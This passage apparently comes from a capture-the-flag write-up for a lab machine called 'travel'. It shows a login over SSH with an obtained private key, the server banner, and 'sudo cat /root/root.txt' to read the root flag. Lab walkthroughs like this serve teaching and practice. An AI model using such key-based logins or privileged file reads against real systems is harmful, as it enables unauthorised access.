After that, run this on your machine:

    └──╼ #chmod 600 id_rsa
    └──╼ #ssh -i id_rsa johnny@
    Creating directory '/home@TRAVEL/johnny'.
    Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-26-generic x86_64)

    System information as of Sun 05 Jul 2020 05:24:46 PM UTC

    System load:                      0.0
    Usage of /:                       46.5% of 15.68GB
    Memory usage:                     13%
    Swap usage:                       0%
    Processes:                        205
    Users logged in:                  1
    IPv4 address for br-836575a2ebbb:
    IPv4 address for br-8ec6dcae5ba1:
    IPv4 address for docker0:
    IPv4 address for eth0:  

    The programs included with the Ubuntu system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
    applicable law.

    Last login: Sun Jul  5 16:05:06 2020 from
    To run a command as administrator (user "root"), use "sudo <command>".
    See "man sudo_root" for details.

    johnny@travel:~$ sudo whoami
    [sudo] password for johnny: 
    johnny@travel:~$ sudo cat /root/root.txt

